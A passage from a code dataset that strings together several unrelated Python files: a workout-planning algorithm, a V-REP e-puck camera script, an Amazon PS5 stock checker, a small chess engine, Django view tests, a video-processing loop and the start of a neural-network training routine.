import maxsize\nfrom math import ceil\nfrom workout.models import Workout, Exercise\n\n# Height in cm\n# Weight in Kg\n# FatPrc in %\n# Muscle sizes {'neck':0,\n# 'rshoulder':0,\n# 'lshoulder': 0,\n# 'rbicep':0,\n# 'lbicep': 0,\n# 'rtricep':0,\n# 'ltricep':0,\n# 'rforearm':0,\n# 'lforearm':0,\n# 'abs':0,\n# 'roblique':0,\n# 'loblique': 0,\n# 'chest':0,\n# 'upper back':0,\n# 'traps':0,\n# 'lower back':0,\n# 'rglute':0,\n# 'lglute': 0,\n# 'rhams':0,\n# 'lhams': 0,\n# 'rquadriceps':0,\n# 'lquadriceps': 0,\n# 'rcalves':0,\n# 'lcalves':0\n# }\n\ndef getNewSizes(before_muscle_sizes, muscle_sizes, muscle_weights, excercise):\n max_muscle_size = max(muscle_sizes.values())\n ex_weights = excercise.getWeights()\n for muscle in ex_weights.keys():\n #print(\"ex weights[\" + muscle + \"] = \" + str(ex_weights[muscle]))\n #print(type(ex_weights[muscle]))\n #print(excercise.getData()['name'])\n #print(\"muscle weights[\" + muscle + \"] = \" + str(muscle_weights[muscle]))\n #print(type(muscle_weights[muscle]))\n #print(\"max muscle size:\" + str(max_muscle_size))\n #print(type(max_muscle_size))\n before_muscle_sizes[muscle] += float(ex_weights[muscle])*max_muscle_size#*muscle_weights[muscle]\n return before_muscle_sizes\n\ndef getScore(before_muscle_sizes, after_muscle_sizes):\n totalScore = 0\n for muscle in before_muscle_sizes.keys():\n if before_muscle_sizes[muscle] > after_muscle_sizes[muscle]:\n totalScore += (before_muscle_sizes[muscle]-after_muscle_sizes[muscle])\n else:\n totalScore += 2*(after_muscle_sizes[muscle]-before_muscle_sizes[muscle])\n return totalScore\n\ndef getTimeInWeeks(max_size):\n max_size += 1\n return -0.0000552399*(max_size**2)+0.0131629*max_size+1\n\ndef getExcerciseList(init_muscle_sizes, muscle_sizes, muscle_weights):\n all_exercises = list(deepcopy(Exercise.objects.all()))\n print(all_exercises)\n minscore = maxsize\n min_ex = all_exercises[0]\n got_new_score = True\n final_excercises = []\n ccount = 0\n while got_new_score:\n ccount += 1\n got_new_score = False\n for ex in all_exercises:\n newscore = getScore(getNewSizes(deepcopy(init_muscle_sizes), muscle_sizes, muscle_weights, ex), muscle_sizes)\n if newscore < minscore:\n got_new_score = True\n min_ex = copy(ex)\n minscore = newscore\n if got_new_score:\n final_excercises.append(deepcopy(min_ex))\n getNewSizes(init_muscle_sizes, muscle_sizes, muscle_weights, min_ex)\n all_exercises.pop(all_exercises.index(min_ex))\n return final_excercises\n\ndef getWorkout(height, weight, fatprc, gweight, gfatprc, days, muscle_sizes):\n\n #all_exercises = Exercise.objects.all()\n max_muscle_size = max(muscle_sizes.values())\n if max_muscle_size == 0:\n pass\n # tühi workout!! ja ainult weightloss/rasvaprotsendi värk\n normative_time_weeks = getTimeInWeeks(max_muscle_size)\n normative_time_days = int(ceil(normative_time_weeks*3))\n\n muscle_weights = {m:0 for m in muscle_sizes.keys()}\n init_muscle_sizes = deepcopy(muscle_weights)\n if max_muscle_size != 0:\n for m in muscle_sizes.keys():\n muscle_weights[m] = muscle_sizes[m]/max_muscle_size\n\n \"\"\"\n minscore = maxsize\n min_ex = all_exercises[0]\n improvement_possible = True\n final_excercises = []\n while improvement_possible:\n for ex in all_exercises:\n newscore = getScore(getNewSizes(deepcopy(init_muscle_sizes), muscle_weights, ex),muscle_sizes)\n if newscore < minscore:\n min_ex = ex\n minscore = newscore\n if minscore == maxsize:\n improvement_possible = False\n else:\n minscore = maxsize\n final_excercises.append(min_ex)\n getNewSizes(init_muscle_sizes, muscle_weights, ex)\n all_exercises.pop(min_ex)\n\n #final_excercises done\"\"\"\n excercises = getExcerciseList(init_muscle_sizes, muscle_sizes, muscle_weights)\n \"\"\"\n for k in init_muscle_sizes:\n print(k + str(init_muscle_sizes[k]))\n for e in excercises:\n print(e.getData()['name'])\n \"\"\"\n return excercises\n\n\n\n","sub_path":"SCULPTR/andmeSisestus/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"21771234","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 5 16:40:22 2017\r\nthreaded camera test for ePuckVRep\r\nmake sure to start first VRep scene ePuckBasicS5.ttt, then cameraViewer.py\r\n\r\n\r\n@author: hans vollbrecht\r\n\"\"\"\r\nimport time\r\nfrom ePuckVRep import EPuckVRep\r\nfrom threading import Thread, Lock\r\n\r\nimport numpy as np\r\nfrom PIL import Image as I\r\n\r\n\r\n\r\nclass CameraTest(Thread):\r\n def __init__(self, resolX, resolY):\r\n \"\"\"\r\n :param\r\n \"\"\"\r\n Thread.__init__(self)\r\n\r\n # behavior matrices for numPy version\r\n self.avoidFrontCollisionMatrix = np.asarray([[1, 2, 0, 0],\r\n [-1, -2, 0, 0]])\r\n\r\n self.keepToWallAtLeftMatrix = np.asarray([[-1, 0],\r\n [0, 0]])\r\n self.keepToWallAtRightMatrix = np.asarray([[0, 0],\r\n [0, -1]])\r\n self.image = I.new(\"RGB\", (resolX, resolY), \"white\")\r\n self._imageLock = Lock()\r\n\r\n def normalizeDistances(self, distances, noDetectionDistance):\r\n \"\"\"\r\n ePuck has higher proximity values for lower distances; also normalize to [0,1]\r\n :param distances: numpy float array\r\n distances measured by proximity sensors; in meters\r\n :param noDetectionDistance: float\r\n maximum distance in meters, same property for all proximity sensors: 0.05 for ePuck\r\n :return: distances: numpy float array\r\n normalized distances measured by proximity sensors\r\n \"\"\"\r\n distances = 1 - (distances / noDetectionDistance)\r\n return distances\r\n\r\n\r\n def calculateMotorValues(self, distances, noDetectionDistance):\r\n \"\"\"\r\n :param distances: numpy float array\r\n distances measured by proximity sensors; in meters\r\n starts with index 0: far left, in clockwise sequence\r\n :param noDetectionDistance: float\r\n maximum distance in meters, same property for all proximity sensors: 0.05 for ePuck\r\n :return: (float,float)\r\n left and right motor velocity\r\n \"\"\"\r\n\r\n maxVel = 120 * np.pi / 180 # 4/3 of a full wheel turn\r\n\r\n velRight = maxVel\r\n velLeft = maxVel\r\n\r\n if all(np.isclose(distances[1:5], noDetectionDistance * np.ones(4))):\r\n # Nothing in front. Maybe we have an obstacle on the side, in which case we want to keep a constant distance with it:\r\n if distances[0] > 0.25 * noDetectionDistance:\r\n [velLeft, velRight] = [velLeft, velRight] + maxVel * \\\r\n self.keepToWallAtLeftMatrix.dot(\r\n self.normalizeDistances(distances[0:2], noDetectionDistance))\r\n\r\n elif distances[5] > 0.25 * noDetectionDistance:\r\n [velLeft, velRight] = [velLeft, velRight] + maxVel * \\\r\n self.keepToWallAtRightMatrix.dot(\r\n self.normalizeDistances(distances[4:6], noDetectionDistance))\r\n\r\n else:\r\n # Obstacle in front\r\n [velLeft, velRight] = [velLeft, velRight] + maxVel * \\\r\n self.avoidFrontCollisionMatrix.dot(\r\n self.normalizeDistances(distances[1:5], noDetectionDistance))\r\n\r\n return velLeft, velRight\r\n\r\n\r\n def getImage(self):\r\n self._imageLock.acquire()\r\n im = self.image\r\n self._imageLock.release()\r\n return im\r\n\r\n def update(self, source, image):\r\n self._imageLock.acquire()\r\n self.image = image\r\n self._imageLock.release()\r\n\r\n def run(self):\r\n robot = EPuckVRep('ePuck', port=19999, synchronous=False)\r\n\r\n robot.enableAllSensors()\r\n robot.enableCamera()\r\n robot.setSensesAllTogether(True)\r\n robot.createImageThread(cameraCycleTime=0.5)\r\n robot.addImageObserver(self)\r\n noDetectionDistance = 0.05 * robot.getS()\r\n\r\n # main sense-act cycle\r\n while robot.isConnected():\r\n\r\n robot.fastSensingOverSignal()\r\n\r\n distVector = robot.getProximitySensorValues()\r\n\r\n #leftMotor, rightMotor = self.calculateMotorValues(distVector, noDetectionDistance)\r\n leftMotor = 0.5\r\n rightMotor = -0.5\r\n robot.setMotorSpeeds(leftMotor, rightMotor)\r\n\r\n time.sleep(0.05)\r\n\r\n robot.disconnect()\r\n\r\n\r\n","sub_path":"imageTakeVrepThreaded.py","file_name":"imageTakeVrepThreaded.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"23932238","text":"from websites import content\nfrom session import client\nfrom bs4 import BeautifulSoup\nimport bot\n\ninfo = content['amazon.com']\nurl = info['url']\ntimeout = info['timeout']\n\nasync def run():\n res = client.get(url)\n print(res)\n soup = BeautifulSoup(res.text, 'lxml')\n sub_class=soup.find(id='availability') #finding that particular div \n print('amazon.com -> ')\n if sub_class: #above result can be none so checking if result is not none\n text = sub_class.find(\"span\", {\"class\": \"a-size-medium\"}).text.strip()\n print(\"availability : {}\".format(text)) \n msg = \"\"\n stock = False\n if (text == 'In Stock.'):\n msg = \"HOSTIAAAAA 😲 Que la PS5 esta en stock! 🔥\\n%s\\nMensaje: %s\" % (url, text)\n stock = True\n elif (text == 'Only 1 left in stock - order soon.'):\n msg = \"CORREEEEE 😲 Que solo queda UNA PS5 en stock! 🔥\\n%s\\nMensaje: %s\" % (url, text)\n stock = True\n else:\n msg = \"F... La PS5 no esta en stock 😢\\n%s\\nMensaje: %s\" % (url, text)\n stock = True\n if (stock): bot.send(msg)","sub_path":"scrapers/amazon_com.py","file_name":"amazon_com.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"428760132","text":"#!/usr/bin/env pypy\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport sys\nimport json\nimport math\nimport copy\nfrom itertools import count\nfrom collections import Counter, OrderedDict, namedtuple\n\n\n# Our board is represented as a 120 character string. The padding allows for\n# fast detection of moves that don't stay within the board.\nA1, H1, A8, H8 = 91, 98, 21, 28\ninitial = (\n ' \\n' # 0 - 9\n ' \\n' # 10 - 19\n ' rnbqkbnr\\n' # 20 - 29\n ' pppppppp\\n' # 30 - 39\n ' ........\\n' # 40 - 49\n ' ........\\n' # 50 - 59\n ' ........\\n' # 60 - 69\n ' ........\\n' # 70 - 79\n ' PPPPPPPP\\n' # 80 - 89\n ' RNBQKBNR\\n' # 90 - 99\n ' \\n' # 100 -109\n ' ' # 110 -119\n)\n\n###############################################################################\n# Move and evaluation tables\n###############################################################################\n\nN, E, S, W = -10, 1, 10, -1\ndirections = {\n 'P': (N, 2*N, N+W, N+E),\n 'N': (2*N+E, N+2*E, S+2*E, 2*S+E, 2*S+W, S+2*W, N+2*W, 2*N+W),\n 'B': (N+E, S+E, S+W, N+W),\n 'R': (N, E, S, W),\n 'Q': (N, E, S, W, N+E, S+E, S+W, N+W),\n 'K': (N, E, S, W, N+E, S+E, S+W, N+W)\n}\n\npst = {\n 'P': (0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 198, 198, 198, 198, 198, 198, 198, 198, 0,\n 0, 178, 198, 198, 198, 198, 198, 198, 178, 0,\n 0, 178, 198, 198, 198, 198, 198, 198, 178, 0,\n 0, 178, 198, 208, 218, 218, 208, 198, 178, 0,\n 0, 178, 198, 218, 238, 238, 218, 198, 178, 0,\n 0, 178, 198, 208, 218, 218, 208, 198, 178, 0,\n 0, 178, 198, 198, 198, 198, 198, 198, 178, 0,\n 0, 198, 198, 198, 198, 198, 198, 198, 198, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n 'B': (\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 797, 824, 817, 808, 808, 817, 824, 797, 0,\n 0, 814, 841, 834, 825, 825, 834, 841, 814, 0,\n 0, 818, 845, 838, 829, 829, 838, 845, 818, 0,\n 0, 824, 851, 844, 835, 835, 844, 851, 824, 0,\n 0, 827, 854, 847, 838, 838, 847, 854, 827, 0,\n 0, 826, 853, 846, 837, 837, 846, 853, 826, 0,\n 0, 817, 844, 837, 828, 828, 837, 844, 817, 0,\n 0, 792, 819, 812, 803, 803, 812, 819, 792, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n 'N': (0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 627, 762, 786, 798, 798, 786, 762, 627, 0,\n 0, 763, 798, 822, 834, 834, 822, 798, 763, 0,\n 0, 817, 852, 876, 888, 888, 876, 852, 817, 0,\n 0, 797, 832, 856, 868, 868, 856, 832, 797, 0,\n 0, 799, 834, 858, 870, 870, 858, 834, 799, 0,\n 0, 758, 793, 817, 829, 829, 817, 793, 758, 0,\n 0, 739, 774, 798, 810, 810, 798, 774, 739, 0,\n 0, 683, 718, 742, 754, 754, 742, 718, 683, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n 'R': (0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n 'Q': (0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n 'K': (0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 60098, 60132, 60073, 60025, 60025, 60073, 60132, 60098, 0,\n 0, 60119, 60153, 60094, 60046, 60046, 60094, 60153, 60119, 0,\n 0, 60146, 60180, 60121, 60073, 60073, 60121, 60180, 60146, 0,\n 0, 60173, 60207, 60148, 60100, 60100, 60148, 60207, 60173, 0,\n 0, 60196, 60230, 60171, 60123, 60123, 60171, 60230, 60196, 0,\n 0, 60224, 60258, 60199, 60151, 60151, 60199, 60258, 60224, 0,\n 0, 60287, 60321, 60262, 60214, 60214, 60262, 60321, 60287, 0,\n 0, 60298, 60332, 60273, 60225, 60225, 60273, 60332, 60298, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)\n}\n\n\n###############################################################################\n# Chess logic\n###############################################################################\n\nclass Position(namedtuple('Position', 'board score wc bc ep kp')):\n \"\"\" A state of a chess game\n board -- a 120 char representation of the board\n score -- the board evaluation\n wc -- the castling rights\n bc -- the opponent castling rights\n ep - the en passant square\n kp - the king passant square\n \"\"\"\n\n def genMoves(self):\n # For each of our pieces, iterate through each possible 'ray' of moves,\n # as defined in the 'directions' map. The rays are broken e.g. by\n # captures or immediately in case of pieces such as knights.\n for i, p in enumerate(self.board):\n if not p.isupper(): continue\n for d in directions[p]:\n for j in count(i+d, d):\n q = self.board[j]\n # Stay inside the board\n if self.board[j].isspace(): break\n # Castling\n if i == A1 and q == 'K' and self.wc[0]: yield (j, j-2)\n if i == H1 and q == 'K' and self.wc[1]: yield (j, j+2)\n # No friendly captures\n if q.isupper(): break\n # Special pawn stuff\n if p == 'P' and d in (N+W, N+E) and q == '.' and j not in (self.ep, self.kp): break\n if p == 'P' and d in (N, 2*N) and q != '.': break\n if p == 'P' and d == 2*N and (i < A1+N or self.board[i+N] != '.'): break\n # Move it\n yield (i, j)\n # Stop crawlers from sliding\n if p in ('P', 'N', 'K'): break\n # No sliding after captures\n if q.islower(): break\n\n def rotate(self):\n return Position(\n self.board[::-1].swapcase(), -self.score,\n self.bc, self.wc, 119-self.ep, 119-self.kp)\n\n def move(self, move):\n i, j = move\n p, q = self.board[i], self.board[j]\n put = lambda board, i, p: board[:i] + p + board[i+1:]\n # Copy variables and reset ep and kp\n board = self.board\n wc, bc, ep, kp = self.wc, self.bc, 0, 0\n score = self.score + self.value(move)\n # Actual move\n board = put(board, j, board[i])\n board = put(board, i, '.')\n # Castling rights\n if i == A1: wc = (False, wc[1])\n if i == H1: wc = (wc[0], False)\n if j == A8: bc = (bc[0], False)\n if j == H8: bc = (False, bc[1])\n # Castling\n if p == 'K':\n wc = (False, False)\n if abs(j-i) == 2:\n kp = (i+j)//2\n board = put(board, A1 if j < i else H1, '.')\n board = put(board, kp, 'R')\n # Special pawn stuff\n if p == 'P':\n if A8 <= j <= H8:\n board = put(board, j, 'Q')\n if j - i == 2*N:\n ep = i + N\n if j - i in (N+W, N+E) and q == '.':\n board = put(board, j+S, '.')\n # We rotate the returned position, so it's ready for the next player\n return Position(board, score, wc, bc, ep, kp).rotate()\n\n def value(self, move):\n i, j = move\n p, q = self.board[i], self.board[j]\n # Actual move\n score = pst[p][j] - pst[p][i]\n # Capture\n if q.islower():\n score += pst[q.upper()][j]\n # Castling check detection\n if abs(j-self.kp) < 2:\n score += pst['K'][j]\n # Castling\n if p == 'K' and abs(i-j) == 2:\n score += pst['R'][(i+j)//2]\n score -= pst['R'][A1 if j < i else H1]\n # Special pawn stuff\n if p == 'P':\n if A8 <= j <= H8:\n score += pst['Q'][j] - pst['P'][j]\n if j == self.ep:\n score += pst['P'][j+S]\n return score\n\n\n\n\n\n\n###############################################################################\n# User interface\n###############################################################################\n\n# Python 2 compatability\nif sys.version_info[0] == 2:\n input = raw_input\n\n\ndef parse(c):\n fil, rank = ord(c[0]) - ord('a'), int(c[1]) - 1\n return A1 + fil - 10*rank\n\n\ndef render(i):\n rank, fil = divmod(i - A1, 10)\n return chr(fil + ord('a')) + str(-rank + 1)\n\n#changing the user move to accomodate for the board flipping\ndef moveSwitch(crdn):\n rdn = []\n if crdn[0] == 'a':\n rdn.append('h')\n elif crdn[0] == 'b':\n rdn.append('g')\n elif crdn[0] == 'c':\n rdn.append('f')\n elif crdn[0] == 'd':\n rdn.append('e')\n elif crdn[0] == 'h':\n rdn.append('a')\n elif crdn[0] == 'g':\n rdn.append('b')\n elif crdn[0] == 'f':\n rdn.append('c')\n elif crdn[0] == 'e':\n rdn.append('d')\n\n if crdn[1] == '1':\n rdn.append('8')\n elif crdn[1] == '2':\n rdn.append('7')\n elif crdn[1] == '3':\n rdn.append('6')\n elif crdn[1] == '4':\n rdn.append('5')\n elif crdn[1] == '5':\n rdn.append('4')\n elif crdn[1] == '6':\n rdn.append('3')\n elif crdn[1] == '7':\n rdn.append('2')\n elif crdn[1] == '8':\n rdn.append('1')\n\n return rdn\n\n#Creating two lists that contain the three-part tuples of the pieces for the JSON\ndef searchBoard(board):\n #tuples for the white team\n teamWhite = []\n #tuples for the black team\n teamBlack = []\n #variable to determine if a king has been killed\n kings = 0\n #starting spot where the pieces are stored in the sting of the board\n start = 21\n #goes through the entire board\n while start < 99:\n #will store a single piece tuple\n temp = []\n #if the spot on the board does not contain a piece\n if board[start] == '.' or board[start] == '\\n' or board[start] == ' ':\n start = start + 1\n #if there is a piece in this spot on the black team\n elif board[start] == 'p' or board[start] == 'r' or board[start] == 'b' or board[start] == 'k' or board[start] == 'q' or board[start] == 'n':\n #y-coordinate of the space\n temp.append((math.floor(start/10))-2)\n #x-coordinate of the spot\n temp.append((start%10)-1)\n #the letter of the piece\n if board[start] == 'n':\n temp.append('h')\n else:\n temp.append(board[start])\n #add this tuple to the list for team black\n teamBlack.append(temp)\n start = start + 1\n #piece is on the white team\n else:\n #y-coordinate of the piece\n temp.append((math.floor(start/10))-2)\n #x-coordinate of the piece\n temp.append((start%10)-1)\n #have to change the letter of the piece to lower case\n if (board[start] == 'P'):\n temp.append('p')\n elif (board[start] == 'K'):\n temp.append('k')\n elif (board[start] == 'Q'):\n temp.append('q')\n elif (board[start] == 'B'):\n temp.append('b')\n elif (board[start] == 'N'):\n temp.append('h')\n elif (board[start] == 'R'):\n temp.append('r')\n #put this tuple into list for white team\n teamWhite.append(temp)\n start = start + 1\n #count the number of kings on the board\n if board[start] == 'k' or board[start] == 'K':\n kings = kings + 1\n #return the lists and the number of kings\n return teamBlack, teamWhite, kings\n\ndef isCheck(pos):\n\n temp = copy.deepcopy(pos)\n for moves in temp.genMoves():\n temp = temp.move(moves)\n unused1, unused2, kings = searchBoard(temp.board)\n if (kings < 2):\n return False\n temp = copy.deepcopy(pos)\n return True\n\ndef gameOverCheck(pos, tw, tb, redstale, bluestale, k, turn):\n enough = 0\n \"\"\"\n inCheck = False\n isCheckMate = False\n check = []\n temp = copy.deepcopy(pos)\n for moves in temp.rotate().genMoves():\n temp = temp.rotate().move(moves)\n unused1, unused2, kings = searchBoard(temp.board)\n if (kings < 2):\n\n inCheck = True\n temp1 = copy.deepcopy(temp)\n for possMoves in temp.genMoves():\n temp1 = temp1.move(possMoves)\n if isCheck(temp1, tw, tb, redstale, bluestale) == False:\n check.append(\"F\")\n else:\n check.append(\"D\")\n temp1 = copy.deepcopy(temp)\n temp = copy.deepcopy(pos)\n if \"F\" not in check and \"D\" in check:\n print(\"checkmate\")\n \"\"\"\n if k < 2:\n if turn == True:\n return 2\n else:\n return 1\n\n if(None not in redstale and None not in bluestale):\n if(redstale[0]==redstale[1] and redstale[0]==redstale[2]):\n if(bluestale[0]==bluestale[1] and bluestale[0]==bluestale[2]):\n return 3\n\n if(len(tb)<3 and len(tw)<3):\n for piece in tb:\n if(piece[2]!='k' and piece[2]!='p' and piece[2]!='b' and piece[2]!='h'):\n enough = 1\n for piece in tw:\n if(piece[2]!='K' and piece[2]!='P' and piece[2]!='B' and piece[2]!='H'):\n enough = 1\n if(enough == 0):\n return 3\n '''\n temp = copy.deepcopy(pos)\n if isCheck(temp.rotate()) == True:\n print(\"not check\")\n temp2 = copy.deepcopy(pos)\n temp3 = copy.deepcopy(pos)\n for moves in temp2.genMoves():\n temp3.move(moves)\n if isCheck(temp3.rotate()) == True:\n print(\"not stale\")\n return 0\n temp3.copy.deepcopy(pos)\n '''\n return 0\n\n\ndef main():\n\n\n #run indefinitely\n while True:\n #initial board\n pos = Position(initial, 0, (True,True), (True,True), 0, 0)\n tb, tw, k = searchBoard(pos.board)\n\n #write the json file\n with open('board.json', 'w') as file:\n json.dump({'black': tb, 'white': tw, 'over':0}, file, sort_keys=True, indent=4, separators=(',', ': '))\n\n red = []\n blue = []\n redstale = []\n bluestale = []\n #fill the last three moves with none\n for x in range(0,3):\n redstale.append(None)\n bluestale.append(None)\n\n\n\n\n #run until a team wins\n while True:\n # We add some spaces to the board before we print it.\n # That makes it more readable and pleasing.\n ' '.join(pos.board)\n\n # We query the user until she enters a legal move.\n move = None\n while move not in pos.genMoves():\n crdn = input()\n move = parse(crdn[0:2]), parse(crdn[2:4])\n\n #make the move\n pos = pos.move(move)\n tb, tw, k = searchBoard(pos.rotate().board)\n red.append(move)\n if(len(red) != 2):\n redstale.append(red)\n redstale = redstale[1:]\n red = []\n ov = gameOverCheck(pos, tw, tb, redstale, bluestale, k, True)\n if ov != 0:\n break\n\n #write json of new board\n with open('board.json', 'w') as file:\n json.dump({'black': tb, 'white': tw, 'over':ov}, file, sort_keys=True, indent=4, separators=(',', ': '))\n\n # After our move we rotate the board and print it again.\n # This allows us to see the effect of our move.\n ' '.join(pos.rotate().board)\n\n\n\n\n #Other team move\n move = None\n while move not in pos.genMoves():\n crdn = input()\n ab = moveSwitch(crdn[0:2])\n cd = moveSwitch(crdn[2:4])\n full = ab+cd\n move = parse(full[0:2]), parse(full[2:4])\n\n #moke move\n pos = pos.move(move)\n tb, tw, k = searchBoard(pos.board)\n blue.append(move)\n if(len(blue) != 2):\n bluestale.append(blue)\n bluestale = bluestale[1:]\n blue = []\n ov = gameOverCheck(pos, tw, tb, redstale, bluestale, k, False)\n if ov != 0:\n break\n\n #write new json\n with open('board.json', 'w') as file:\n json.dump({'black': tb, 'white': tw, 'over':ov}, file, sort_keys=True, indent=4, separators=(',', ': '))\n\n\nif __name__ == '__main__':\n main()","sub_path":"chessengine.py","file_name":"chessengine.py","file_ext":"py","file_size_in_byte":17669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"189003986","text":"#libs\nfrom django.test import TestCase, Client\n\n#local\nfrom albums.models import Category, Artist\n\n\nclass ViewTest(TestCase):\n def setUp(self):\n self.client_stub = Client()\n self.category = Category(name='Test Category', slug='test-category')\n self.category.save()\n self.artist = Artist(first_name='TestFirst', last_name='TestLast',\n start_date='2013-02-11', user_id=1)\n self.artist.save()\n\n def test_view_home_route(self):\n response = self.client_stub.get('/albums/')\n self.assertEquals(response.status_code, 200)\n\n def test_view_category_route(self):\n response = self.client_stub.get('/albums/category/')\n self.assertEquals(response.status_code, 200)\n\n def test_add_category_route(self):\n response = self.client_stub.get('/albums/add_category/')\n self.assertEquals(response.status_code, 200)\n\n def test_create_category_successful_route(self):\n response = self.client_stub.post('/albums/add_category/',\n data={'name': 'TestCategory',\n 'slug': 'test-category',\n 'content': 'test content'})\n self.assertEqual(response.status_code, 302)\n\n def test_create_artist_successful_route(self):\n response = self.client_stub.post('add_artist',\n data={'user_id': '1',\n 'first_name': 'TestFirst',\n 'last_name': 'TestLast',\n 'start_date': '1970-02-11',\n 'end_date': '2013-01-02',\n 'born': '1945-02-02',\n 'known_as': 'Test',\n 'category': 'Blues',\n 'tags': 'test'})\n self.assertEqual(response.status_code, 302)\n\n def tearDown(self):\n self.category.delete()\n self.artist.delete()\n","sub_path":"albums/test/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"438011672","text":"import numpy as np\nimport cv2\nimport sys\nimport argparse\nimport time\n#from matplotlib import pyplot as plt\n\ncv2.namedWindow('dst', cv2.WINDOW_NORMAL)\n\n\n#from engines.simple import processor\n#from engines.rectangular import processor\nfrom engines.scipio import processor\n\ndef getArgs():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-v\", \"--video\", required=True,\thelp=\"path to input video file\")\n return vars(ap.parse_args())\n\ndef show(image, dst='dst'):\n cv2.imshow(dst, image)\n\nargs = getArgs()\n\n#utils.create_hsv_slider()\n#utils.create_area_slider()\n\n#detectorm = Detector(args)\n\ncap = cv2.VideoCapture(args['video'])\nframe = None\npause = False\n\ncv2.namedWindow('original', cv2.WINDOW_NORMAL)\n\n#figure = plt.figure()\n#img = figure.add_subplot(121)\n#plt.show()\n\ni=0\nwhile(cap.isOpened()):\n i+=1\n key = cv2.waitKey(1)\n\n if key==ord('q'):\n break\n\n if key==ord(' '):\n pause = not pause\n\n if not pause:\n ret, frame = cap.read()\n\n if frame is None:\n break\n\n show(frame, 'original')\n\n start = time.time()\n image = processor(frame)\n elapsed = time.time() - start\n if i%10==0:\n print(\"%d ms to finish\" % int(elapsed*1000))\n\n show(image)\n #img.imshow(image)\n\n time.sleep(0.01)\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"experiments/process-video.py","file_name":"process-video.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"545174227","text":"import numpy as np\nimport sys\nfrom functions import activation, activation_derivative, softmax\n\n\ndef forward(conf, X_batch, params, is_training):\n \"\"\"\n Forward propagation through fully connected network.\n\n X_batch:\n (batch_size, channels * height * width)\n \"\"\"\n n = conf[\"layer_dimensions\"]\n L = len(n) - 1\n\n # Saves the input\n A = X_batch\n features = {}\n features[\"A_0\"] = A\n\n # Loop over each layer in network\n for l in range(1, L + 1):\n A_prev = A.copy()\n Z = np.dot(params[\"W_\" + str(l)].T, A_prev) + params[\"b_\" + str(l)]\n\n # Calculates activation (Relu, or softmax for output)\n if l < L:\n A = activation(Z.copy(), \"relu\")\n else:\n A = softmax(Z.copy())\n if is_training:\n # Save activations if training\n features[\"Z_\" + str(l)] = Z.copy()\n features[\"A_\" + str(l)] = A.copy()\n\n # Y_proposed is the probabilities returned by passing\n # activations through the softmax function.\n Y_proposed = A\n return Y_proposed, features\n\n\ndef backward(conf, Y_proposed, Y_reference, params, features):\n \"\"\"\n Backpropagation through the fully connected network.\n \"\"\"\n n_y, m = Y_reference.shape\n n = conf[\"layer_dimensions\"]\n L = len(n) - 1\n grad_params = {}\n\n # Output layer gradient. Gradient of loss using softmax.\n dZ = Y_proposed - 